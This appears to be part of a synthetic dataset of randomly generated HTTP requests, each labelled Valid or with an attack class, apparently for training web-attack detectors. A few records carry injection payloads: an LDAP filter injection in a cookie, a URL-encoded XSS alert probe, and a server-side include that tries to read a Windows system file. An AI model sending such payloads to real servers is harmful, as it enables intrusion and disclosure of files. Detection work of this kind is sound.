X-Serial-Number: 643504609
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31911
Start - Id: 37469
class: LdapInjection
GET /oeooetc5aaotie/dbo.swf?ldasd=p%3As&cibwtdmt9eq=2661776408&htalaexrn5caei=0I%3Dxtermvekw&P6EW-T=262527&BJmYBm7oa=j&anevrCt=1&hol=200&oef0itbreExfna=51&3LrdeletebNK=tu7kriih2e&kb=15181559 HTTP/1.0
Host: www.snnsg1ng.fr:9779
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.1, iso-8859-8;q=0.7, windows-1254;q=0.0, koi8, windows-1253
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 49.91.185.115
Cookie: Gat3gUofmre=w o+eclnonunye;cSqt=stoph9n;eeotmer=ucnle0d;ADEI5KBr=")(targetfilter=(o=NetscapeRoot));Tup3adminzS=751;sah=pde
Cookie2: $Version="47"
Date: Thu, 04 Aug 05 04:57:22 UTC
ETag: "gPwg0WIuJSde7CWp"
Expect: 100-continue
From: 7EAiyd@ttlgtqrt.st
If-Modified-Since: Sun, 22 Oct 06 13:55:31 GMT
If-Unmodified-Since: Sat, 17 Oct 09 14:10:12 CET
If-Match: *
If-None-Match: "R4-7vunUtGatLwaHl"
If-Range: Tue, 26 May 09 24:16:31 GMT
Max-Forwards: 1033
Pragma: no-cache
Authorization: Basic ZmU3MFpsZU86ZWVha2FnYUY=
Range: 2-927066
Referer: http://iarf.de/amhgro7/maNrcige.asmx
TE: chunked
Trailer: Accept-Encoding
User-Agent: aolai4dcci11sulfrfSc
UA-CPU: x86
UA-OS: Win9x
UA-Pixels: 3899x9928
Via: 4.8 www.then.css, HTTP/0.3 www.in2td.gif, 0.4 www.tafowef.shtml:060
Transfer-Encoding: identity
Upgrade: ens/6.5, xiai/8.2
Warning: 550 188.118.198.66 "e3shscreagec7" 
X-Serial-Number: 9576766349708862183
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37469
Start - Id: 32473
class: Valid
GET /lffettohdevtao/a_KJ4E_BpqPCLl/nh76hurqbaic6zgo/eicVdqbvxq5/iFst4.shtml?tdlhhaKr=644583&sgehshsobenrnw=rOdmahed3R HTTP/1.0
Host: www.erteix.org:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesetrad;q=0.6, iso-8859-6, windows-1255, iso-8859-6, utf-7;q=0.4
Accept-Encoding: 
Accept-Language: tomT-i;q=0.0, tfmc2-egaheeb, a-EadEri, efkligd-elertx
Cache-Control: min-fresh=4
Client-ip: 93.135.40.113
Cookie: aTdi=rWne;SzXFoN=vf0rg;odefqa0aoit=i2etraRliy;eChecihusJsrah=866708;wgt7FhwlorvMc= b
Cookie2: $Version="9"
Date: Wed, 14 Oct 09 08:49:33 UTC
ETag: W/"Phb_CuN3CBeWzEnJ0F"
Expect: btmuwH=aA9If
From: rltd@seslfu5.st
If-Modified-Since: Wed, 25 Jan 06 19:46:55 CET
If-Unmodified-Since: Mon, 04 Feb 08 20:58:58 GMT
If-Match: "dS60DOhvi.fCyBI0A1UZ"
If-None-Match: *
If-Range: Mon, 29 Sep 08 10:43:05 UTC
Max-Forwards: 57
MIME-Version: 9.2
Pragma: teriat=re
Proxy-Authorization: vevw8 1cuh=UotoAAs
Authorization: Digest opaque="aesdctfu"
Range: 9261-,-602,5969-
Referer: /dnrM/adae4.bin
TE: chunked;q=0.9,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.2 (X11; U; Linux i586 4.5; if-ai; rv:2.3.1) Gecko/88430530
UA-CPU: MIPS
UA-Disp: 1956,0325,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 116x3717
Via: 0.4 www.usfiv.jpeg:8, HTTP/3.6 www.eidinbv.html, 5.7 www.csr9.png
Transfer-Encoding: compress
Upgrade: ternt/2.2, gvhrO/1.0, 2n4E3h/6.6, 5tnucz/1.4, tsojiD/3.4
Warning: 045 www.jVoAw.htm:318 "Wteirsteatrhje7brwtl" "Thu, 17 Sep 09 15:24:18 UTC"
X-Forwarded-For: 171.216.17.6
X-Serial-Number: 31593732
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32473
Start - Id: 1807
class: Valid
GET /rs5kQnMHrm/ctX82xxzgT8PrP65gqdN.htm?hond=sie&yBlinkxUGgDJ=mwp-ae&NPMtmp15=499&Peeaivwe=+nunetcatr0hercp+uiI&aou=fen HTTP/1.1
Host: 140.191.216.184
Connection: udopeiu
Accept: application/postscript, audio/*
Accept-Charset: cp-932, windows-1254;q=0.5
Accept-Encoding: 
Accept-Language: ife-n;q=0.5
Cache-Control: si5=emesebir
Client-ip: 112.181.5.69
Cookie: Eh=aevvarrjcvose2S;Shs7ceoMel=eDB8o-l;dtee=b2;6yMExS=424788
Cookie2: $Version="4"
Date: Tue, 11 Dec 07 21:57:55 CET
ETag: "@oq1YXMt3iL8DPs"
Expect: 100-continue
From: itav@toutp6culd.com
If-Modified-Since: Tue, 23 Oct 07 06:30:00 GMT
If-Unmodified-Since: Fri, 19 Sep 08 09:33:28 CET
If-Match: "7iLm.tfga@L_due_8e3"
If-None-Match: *
If-Range: Tue, 24 Jun 08 16:59:22 UTC
Max-Forwards: 9293
MIME-Version: 0.4
Pragma: 8Col='agoeeai3'
Proxy-Authorization: NTLM Yzd0MGhYc25oaDhudDgwcmVhdGVublZld3VkYWFjbGlvZnQ=
Authorization: Basic R21ham9qcjpzYXcyaHQ=
Range: 9724-,33511-083617,2-
Referer: /gilnl/foRoeo98/0onamtdt/alptf/sHznu.shtml
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/8.0 (X11; U; Solaris 3.0; nI-zr; rv:0.8.4) Gecko/21589586
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 912x237
Via: 0.4 www.sehendoa.tiff
Transfer-Encoding: deflate
Upgrade: cfa/2.8
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1807
Start - Id: 13158
class: Valid
GET /6ovbscriptZhDo5TfYy-/n09V/ra/l35o8zgOIXd4VWph45b/eew44eala/ao6ZZqOQ0/lBDP9e/7olhtTwiueermoa1.html? HTTP/1.0
Host: www.ptbpny9dt.biz
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.8, x-mac-chinesetrad, cp-936;q=0.9, ks_c_5601-1987;q=0.5, shift_jis;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 74.65.3.173
Cookie: f0eosBed7= g
Cookie2: $Version="2"
Date: Fri, 09 Jan 09 15:27:20 UTC
ETag: W/"P8rNSL5HVu3tWde"
Expect: eE0kef
From: ibuest@tharmq.fr
If-Modified-Since: Mon, 18 Jun 07 06:30:50 GMT
If-Unmodified-Since: Thu, 08 Feb 07 06:20:35 GMT
If-Match: "K0y@NIJA.My2v0h"
If-None-Match: "UciD0zCslT4vWbW3-"
If-Range: "U3Tlz7TpdKWCpI@CTbQb"
Max-Forwards: 0818
MIME-Version: 8.5
Pragma: tdautse0='zimdE6Is'
Proxy-Authorization: Digest realm
Authorization: Digest opaque="gIrbgdp"
Range: -22,686-,439169-
Referer: http://www.ieigign.cz/FIets.jsp
TE: deflate;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: rg_GOmSX http://www.Niege.org
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6456x555
Via: 5.5 182.21.250.254
Transfer-Encoding: compress
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 728 164.233.246.188 "twrTee9rEu95arsato" "Tue, 26 Oct 04 22:26:31 GMT"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 74489
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13158
Start - Id: 7711
class: Valid
PUT /f2sovtn0/-wN7MSmV7@tuZ/97yiarX4sCPWsxcP/seheo4eIngvlAD/gaQZCP@/iJVnN@V.css? HTTP/1.0
Content-Length: 105
Content-Language: 74nstaq,6
Content-Encoding: compress
Content-Location: /sdiotoee/8nlrn/ypot/0woneha.cfm
Content-MD5: bm9vcGVuZmdoc2VhaTFlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Aug 07 11:26:50 GMT
Last-Modified: Sun, 03 Feb 08 16:24:22 UTC
Host: www.rhlcV0uacb.de:3
Connection: aoatiree
Accept: */*;q=0.6
Accept-Charset: windows-874;q=0.8
Accept-Encoding: *
Accept-Language: Axn-ifn;q=0.2
Cache-Control: max-age=0262
Client-ip: 53.244.216.41
Cookie: CAQbgsound7tSDTg3=eeIkfaes9nieea8;osTng=lsrtwmope;oi=9;openmd2Uvar@iPlDG=gei](2rb;oncm1seE5vl=3269998;htattiir2AGhE=ecsCs
Cookie2: $Version="580"
Date: Sat, 03 May 08 04:03:16 UTC
ETag: W/"Tf-T-dYsVGH74pjg4"
Expect: 100-continue
From: hmytnwrh@n44u6.net
If-Modified-Since: Sat, 17 Mar 07 01:34:20 GMT
If-Unmodified-Since: Sun, 02 Jul 06 15:30:30 CET
If-Match: "eiFjWhnyrPcUZUqob-"
If-None-Match: "KuuCkqXjMRG3aC@UA"
If-Range: "DhdBmmSH2fFT-6nuBl"
Max-Forwards: 3
MIME-Version: 7.7
Pragma: ebeeut='xhe9tS'
Proxy-Authorization: NTLM ZVNjaGhjZGlpM3VUUm95ZWUxcmVnQ2tpcG43OFpsZXJudGtyaW5u
Authorization: Basic b29sVG9lOjllVHU0bQ==
Range: 379802-58050
Referer: http://www.natdhca.de/iarshRr/saYsOnp/tEoz.swf
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: 7oeOczv/4.5.4
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 507x2822
Via: loEbce/9.4 131.119.244.154, 4.3 52.89.24.111:59272
Transfer-Encoding: identity
Upgrade: liyti/7.1, biteq/1.2
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 8041864595
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~

S@LL6xGxp_N=ePEjlTxvgaf&gHr=~tmpinsertailaeu&OfRdrmNexechejautoexec=283686109&ba1Tsoo=39797&zar=5015546

End - Id: 7711
Start - Id: 33376
class: Valid
PUT /flqgp8ttioPnMioo/onpauNPi/lheTate2w/erawVbttei0o.jsp? HTTP/1.0
Content-Length: 247
Content-Language: lfda,m9heg2
Content-Encoding: deflate
Content-Location: /SenI1dut/reott/esapm/dbnaUn/Eohotd.exe
Content-MD5: Y3RzaW9sb3hhaWlpZWxlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Mar 10 20:49:17 CET
Last-Modified: Mon, 27 Nov 06 15:12:32 UTC
Host: 169.181.13.139
Connection: ptissaco
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.0, gb2312;q=0.5, iso-2022-kr;q=0.4, iso-2022-jp
Accept-Encoding: compress, gzip;q=0.4, gzip;q=0.2, deflate, deflate;q=0.6
Accept-Language: s-rrr;q=0.2, obmeruu-x, 1rencott-ujqn;q=0.9, t-6oe1tf;q=0.4
Cache-Control: max-age=401
Client-ip: 86.188.58.100
Cookie: enca=eew;2T6sqdtoht=su379IN;ITnoOeja=5ienietI;eSnnsi=en1aio;naq=roes1eFgBmsRa
Cookie2: $Version="6"
Date: Tue, 11 Jul 06 17:18:47 CET
ETag: W/"rK1_UL8kFuqq0Ietm"
Expect: dFxo=ihceie7
From: 3ton@bihnHawNg.be
If-Modified-Since: Tue, 31 Aug 04 08:08:29 CET
If-Unmodified-Since: Wed, 16 Jul 08 10:40:45 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Apr 04 17:15:38 UTC
Max-Forwards: 053
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: NTLM c3J0ZmVzdG5odHdldHJtOHZzakJwNWVpZmVuaHRmbHV0bzJiaQ==
Range: 19880-,6-
Referer: http://Tbrhbdod.biz/HMlhcun.php3
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 2.5; am-a4; rv:1.9.5) Gecko/77644677
UA-CPU: 68000
UA-Disp: 987,602,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3714x6076
Via: 5.3 www.8khlos.png, 0.8 207.223.174.34, FTP/1.6 217.33.47.96
Transfer-Encoding: deflate
Upgrade: hix3/8.0, Imde/9.7, cyao/6.6, etnO8n/7.1
Warning: 083 www.fspp3om.jpeg "iC94etihocgcee3e" 
X-Forwarded-For: 113.32.119.185
X-Serial-Number: 93235551323019151899
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

elig=oO1j2wqVi3I&c6if2pthftcrv=401165&agjn=-ec94&0oRn=>btlobodysseeom?a=>l&om2efsue1elayo=geni&nufd4wsmdi=7765583&eEcvomdot=lod(y5z1ypeowfo&Ieas4lmhd=i-&ramoR=rOtd@Eh kee+da&tsIdetTor=27&La=qVdXdt&aetet=hHLB&Oaccess_logq79Aj7k3P=1cce

End - Id: 33376
Start - Id: 30096
class: Valid
GET /uooTi3EDk.yCUYSo3nYs/35PFjoJgs/pkeneiras.aspx? HTTP/1.1
Host: 2.98.122.146:5784
Connection: keep-alive
Accept: video/quicktime;q=0.0, text/*, image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.5, gzip;q=0.1, gzip;q=0.4, gzip;q=0.0
Accept-Language: ehsdlut-nef, aaiieoe-oe9
Cache-Control: only-if-cached
Client-ip: 21.178.55.72
Cookie: ifeecsunbbnngBg=eY5CMaGgZX;In=2KnWFYBX3;ei=3007
Cookie2: $Version="5"
Date: Tue, 10 Feb 04 21:58:07 GMT
ETag: W/"Ocoimis9INXKn05DKM"
Expect: 100-continue
From: mhodu2@U9yLcoem.st
If-Modified-Since: Mon, 17 Mar 08 20:13:41 CET
If-Unmodified-Since: Sun, 15 May 05 01:59:16 GMT
If-Match: "i@7QGTvE47XV4Wv"
If-None-Match: *
If-Range: *
Max-Forwards: 5990
MIME-Version: 3.3
Pragma: ha='htiITn3'
Proxy-Authorization: NTLM dDNhY2RiZWVrZGVvdHlnYW50YWlJMzNpcjFpNnBvZHl4RHJydGJvdGxtNA==
Authorization: NTLM YXAyb2h0ZGR0dXVyZWNIY2Uwb3l0bmFYc2VhcHplcGFtbkE2Z251a2xh
Range: -5
Referer: http://t1os.uk/1tdt/AtigerIc/tRsmhos/1rnkne/OjFE589.wmn
TE: trailers,trailers
Trailer: Date
User-Agent: beth (i.1ybLF; ef_k84Bz1S; nzx.KXS9)
UA-CPU: MIPS
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 118x9358
Via: 8.5 www.5cuimNaz.gif:58, FTP/1.8 100.181.210.255, 8.3 126.143.35.28
Transfer-Encoding: compress
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30096
Start - Id: 14984
class: Valid
GET /tE6aa7nheisiii/skwTk/rjentpesEOttilnse/8Zq7S/ppvan/ato/snhu/l-nj6XhPdUzRzQt/n.0Qn@YgH5pQEqyHO/jhLdolepstaW7Obneoas/sock_streamA/dZIPx.js?amqEBd=var%271&ebh5tmscy=970414&Hhttp3a2includeD@1=axu7sdqml&axK7gXFlocationMkJ=216&dyseeyo=ginip&w7a1IP=t%5D&T6iWatda=u%25&nonlilGelto4Ita=O6ZtAyeb13Na HTTP/1.1
Host: 250.143.150.187
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.0, iso-8859-8-i;q=0.4, x-mac-icelandic;q=0.3
Accept-Encoding: 
Accept-Language: newRgeno-h4ewhoeF, tco-mhaftold
Cache-Control: only-if-cached
Client-ip: 232.214.66.14
Cookie: ifpteotlonpf=5saodx;q.WW=ewsWVAtD
Cookie2: $Version="031"
Date: Sun, 01 Feb 09 20:20:13 UTC
ETag: "MJgWBIGPuMOQqX4O2-eM"
Expect: onccha
From: mrepe@2e6fkf.net
If-Modified-Since: Wed, 05 May 10 16:17:29 UTC
If-Unmodified-Since: Thu, 29 Apr 04 02:17:28 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Dec 04 16:05:57 CET
Max-Forwards: 7161
MIME-Version: 3.1
Pragma: seeeiar='R1'
Proxy-Authorization: Digest uri=http://vAstenth.fr/aetiuo/dsPar/ieeum/siatoRdt.png
Authorization: nwea iasu0ton=stbte
Range: 1538-,-4818
Referer: http://hticu.fr/9ate/deznsts.mdb
TE: trailers,trailers,deflate
Trailer: Range
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 0.2; 4s-ne; rv:7.1.5) Gecko/34936611
UA-CPU: PowerPC
UA-Disp: 803,2370,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8957x255
Via: 7.7 15.69.171.29, 1.6 www.vrfs.js
Transfer-Encoding: nteule
Upgrade: nloi/6.1, nov/1.3, amrmxt/9.7, 8etw/8.7, 6ta/6.4
Warning: 058 66.139.140.245 "temrthaopc3v" "Tue, 05 Dec 06 10:50:29 GMT"
X-Forwarded-For: 185.234.198.95
X-Serial-Number: 158686381572781
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 14984
Start - Id: 48055
class: XSS
GET /mFO.ElBDDTpSzTOOp/wTn3y_yEcwiC6F/98cAntpedotejrelnrw/1Ps78jTregklS_sYZ/nlSowt/e8PE0/pJ4i_fpnVK9as/ahYs4Kt4S/eh9PNoj5D/lXGrmvOYH/bFhKzH-jLkY79hwC8.png?neHstbtejie=%26%7B%5Balert%28%27NaJstzjthr%27%29%3B%5D%7D%3B&keo7o9sutbuaiad=Rdse%40%29dnctsamdTfKdoxE&dzijn=dee%3D&4sckpbAjmtis=ttdetcsru HTTP/1.0
Host: 191.113.117.150
Connection: ant6mr
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity, identity;q=0.8
Accept-Language: Ssc-cri
Cache-Control: max-age=562
Client-ip: 199.91.154.140
Cookie: nktptee9eng=sz@92BOF;sgaEc4yrpSn=te
Date: Thu, 20 Oct 05 04:09:16 GMT
If-None-Match: *
Authorization: NTLM MWFoMzQzc21kYWx5ZG82dGFIc09mbmV0ZUhnZWRjZHRneWVldXVuMw==
Referer: /ektep/eexih7/oani/4ooonE.mdb
User-Agent: olEgiEoien (pqyu-slNP; 03O-hMN1; 2-Vl.QD.)

null

End - Id: 48055
Start - Id: 40514
class: SSI
GET /b2/dFgf_2rQhMj_.ciA/mv/2fcbkamJ6WuTqhC/eXh/wDFdR/wLRaspF_R6Hz1W6h/_oXf1cTQBMk/ejEcQn/i5hnhe7ir7apnt5G/sWdthrtSpa79hl.html?kpq8=wxterma&q4on=eneh5&sAj=eplnc7a%3Bhz&etghb7uien6tO=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&KDchwS@QoHf=9ata9C&eohcqateCtoa7M5=segowinntdiv&9NoW8sm=n+ei&Vf9sr=7&yivseiOhI=ds+bNoApositiong&itrda=6&pTpXrv=SCegamuotkybqol5e HTTP/1.0
Host: 251.132.113.138
Connection: sgonSs
Accept: application/*;q=0.2, image/*;q=0.5
Accept-Charset: cp-936
Accept-Encoding: *;q=0.3
Accept-Language: Yy-BuMbd;q=0.4, qoT-ohDeO, 2r-nri0hi, oriew02S-qlexmEh;q=0.1
Cache-Control: no-cache
Client-ip: 158.148.52.83
Cookie: saoa=ee5MaUaL;iegaoats=788788;fbn=dt7e5Ks;3sak6=src'fw=ss0nelwinntt;ae9adibId=8370
Cookie2: $Version="046"
Date: Thu, 30 Jun 05 24:16:57 GMT
ETag: "YoCd.ppwExewST-Z"
Expect: 100-continue
From: ahew8h@v0rtaRr.ch
If-Modified-Since: Mon, 24 Jul 06 01:31:00 CET
If-Unmodified-Since: Tue, 03 Jun 08 22:57:17 UTC
If-Match: *
If-None-Match: "ulXJbbnoCNdic9EPEz"
If-Range: "vXl6oPc_Wpv1p4b"
Max-Forwards: 4207
MIME-Version: 4.1
Pragma: z=6edn9Nt
Proxy-Authorization: mmone heot=htan
Authorization: NTLM Y0J0cmVhcm5hcnJhZWdiZW9jYWxzN2syY3pyOHR0c3JhaWtmeGQ=
Range: 049-19497,328865-,-538
Referer: /sfeiey/ooiyeelt/ijnAy.css
TE: trailers,gzip;q=0.5,trailers
Trailer: TE
User-Agent: Mozilla/4.6 (compatible; MSIE 2.1; Open BSD i586; 0hs8lion; e3tafqa)
UA-CPU: StrongARM
UA-Disp: 591,998,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 278x2627
Via: 8.6 173.85.84.178, 0tz/4.6 59.214.9.80
Transfer-Encoding: deflate
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 4796093744
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40514
Start - Id: 1127
class: Valid
GET /rB@n3UXyVdcLJQ0wEn1/eW-ebEmSkeUwCKDbYJD/Tg0/d9FGJallmqc.tiff?f9Xgkl=la0btRgets&GrsShCx=44&4lpsoikrxgUre=412&kBKjCF=aunEi&dhbbjanm6oi=cenrt9lsa&dtsTuaen=2 HTTP/1.0
Host: 199.136.239.69:80
Connection: keep-alive
Accept: image/*;q=0.4
Accept-Charset: isiri-3342;q=0.4, x-mac-greek, isiri-3342, windows-1255;q=0.6
Accept-Encoding: 
Accept-Language: jwobEIt-n
Cache-Control: max-stale=35183
Client-ip: 34.59.230.83
Cookie: rnn=]jot%wlocationchild'cownr5i;6and57=a3rinsertT2euuconnecttA;omEinSpEeenR=rXwJ6BS
Cookie2: $Version="1"
Date: Wed, 03 Jun 09 22:22:06 GMT
ETag: "aVqm8HIW@agllkmHBz"
Expect: nrsr
From: hsrtboi@onni.cz
If-Modified-Since: Wed, 14 Mar 07 07:46:47 CET
If-Unmodified-Since: Fri, 29 May 09 01:42:59 GMT
If-Match: "mdbK@UUEFEQRBVE"
If-None-Match: "pNMYY_rvG2wZv7y9ulkf"
If-Range: *
Max-Forwards: 37
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: NTLM cmV0ZXBtYjd0Q0VkbWYwYm9jQ3hlb1RoY3RuYWU2N3dsOHRJYQ==
Range: 9-345,-0,-259
Referer: /ro7y8i.txt
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (X11; U; SunOS sun4u 4.0; aa-oh; rv:9.7.0) Gecko/22712330
UA-CPU: PowerPC
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2688x3357
Via: FTP/7.7 196.93.14.1, FTP/8.0 208.13.184.158, 3.8 24.27.206.217
Transfer-Encoding: identity
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 212.205.31.150
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1127
Start - Id: 23149
class: Valid
GET /TTudpasswdYaP/ChttpimgpositionVVFNG/fnlitfeL2l8/t5u.css?Oc-aGzwp-@Yncp6=3193419&hmkSgoehO=0dDMfsP&oeiao2Da=tl%3A&zEDE9Rrrdau=q23Gr&CO4FZXnodelx=sRkYQh HTTP/1.1
Host: www.30deuOti.fr:0
Connection: ikidl
Accept: video/*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.9, identity, compress, identity
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 147.170.210.217
Cookie: tsIen3kL=ss-;ctahe=l]
Cookie2: $Version="141"
Date: Thu, 29 Mar 07 06:59:27 CET
ETag: W/"DoQ3O1.-wYoAiKs"
Expect: srvh=dslq;Lte6owo
From: a2se@eeeshaoved.st
If-Modified-Since: Sun, 20 Nov 05 05:27:01 UTC
If-Unmodified-Since: Fri, 31 Jul 09 10:47:19 CET
If-Match: "DJNIb1g6by8UlV2CQu"
If-None-Match: *
If-Range: *
Max-Forwards: 7545
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: vmNes wviEoe4=octBtseu
Range: 566-769965,-745
Referer: /dilaiC/inetemd/3uaaetR/re6rlgve/biac.wav
TE: deflate
Trailer: Proxy-Authorization
User-Agent: xmdupc4e (pquVBSXaX; nI5J1htv; nOJpnB)
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 558x894
Via: 8.6 233.112.146.116:0667, FTP/4.5 www.ruy3C.htm
Transfer-Encoding: identity
Upgrade: alhtt/8.0
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 179.20.58.194
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23149
Start - Id: 8688
class: Valid
GET /8gWJeO2Wk2P6c78.msf?keicytS=iR0ySbrGQ&vgoeiri=puc&vn=u%3FM&stott=rW28MYP&hs1bujlsscij=81433&sSlaanehsSit=CDewCiatSwc&sal=bifh&eeeNw=mioilsehe1tge6slJm&trhwpvreefnndsx=%28MLho%26fneip&6n8=38 HTTP/1.1
Host: 50.135.168.243
Connection: close
Accept: image/jpeg;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eron-ehtbvE;q=0.9, ccNuehre-ssik;q=0.0, Ia-eec
Cache-Control: no-transform
Client-ip: 104.87.64.242
Cookie: oakoTieroig=07
Cookie2: $Version="074"
Date: Sun, 27 Dec 09 12:41:37 CET
ETag: "PnKuom@5AOAYDDzb"
Expect: 100-continue
From: oiwotd@lueeymap.be
If-Modified-Since: Tue, 17 Jul 07 02:00:31 UTC
If-Unmodified-Since: Wed, 10 Dec 08 15:30:00 GMT
If-Match: "VBbH7pcH8fYJi.rb"
If-None-Match: "RQOacf_oWTP-XOApXa_y"
If-Range: Wed, 03 Mar 04 02:13:36 GMT
Max-Forwards: 01
MIME-Version: 5.6
Pragma: poefdG='NoEh3'
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: NTLM SUZyc3RsbWRlZW9xaUh3bm5ocklhZnRzdGxpb2U3aWFmZWJlVzZPdHN0MA==
Range: -1251,-8,78356-
Referer: http://qtja.de/qtnstAz/rurebeay.mdb
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.1 (X11; U; Linux i386 8.2; al-sl; rv:8.2.0) Gecko/16004924
UA-CPU: Sparc
UA-Disp: 061,763,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8393x485
Via: 9.4 www.lwzHE.htm, FTP/2.2 55.203.22.105, HTTP/1.6 91.233.158.206
Transfer-Encoding: deflate
Upgrade: 81ihR/9.8, iiess/1.4, hse/9.5
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8688
Start - Id: 4878
class: Valid
PUT /425AYFm-S5aelT5l/wYFYbrVRpPEBNnSFwg4_/olaPsrqeo/f5uj/FevalSxmlSUg.cgi? HTTP/1.0
Content-Length: 68
Content-Language: euhmqp,ebSde
Content-Encoding: compress
Content-Location: /Uaswj4/tneIud/t6SEo/sedl3/diiSGu8r.shtml
Content-MD5: c2V0aHh0d091Ym5leGdlag==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Sep 06 15:21:57 CET
Last-Modified: Thu, 11 Sep 08 18:35:49 GMT
Host: www.mZSidnu.gov:792
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress;q=0.0
Accept-Language: a-i;q=0.9, pri-stn, nd-s5caat;q=0.1, 6esae-oeoft, Trsxuo-dnrSl
Cache-Control: max-stale=89932
Client-ip: 184.17.21.85
Cookie: Hv2ubhc6Rihmtdm=1417;lpototejay=93775;DAra=dk
Cookie2: $Version="284"
Date: Tue, 30 Sep 08 20:51:58 CET
ETag: "dcMVOniXcAScfLf"
Expect: 100-continue
From: itds3@bta1toaaio.be
If-Modified-Since: Fri, 17 Jul 09 09:41:43 GMT
If-Unmodified-Since: Sat, 21 Jul 07 10:58:06 GMT
If-Match: "Hb--sT16SrAUSEOy"
If-None-Match: "duanFDnrkLEAAi502"
If-Range: "PCUmnps3wKRQpT@VpY"
Max-Forwards: 192
MIME-Version: 4.1
Pragma: nmif=Awr9coua
Proxy-Authorization: Digest qop=auth
Authorization: Digest nc=Ac68027f
Range: -9436,543-074868,5089-106
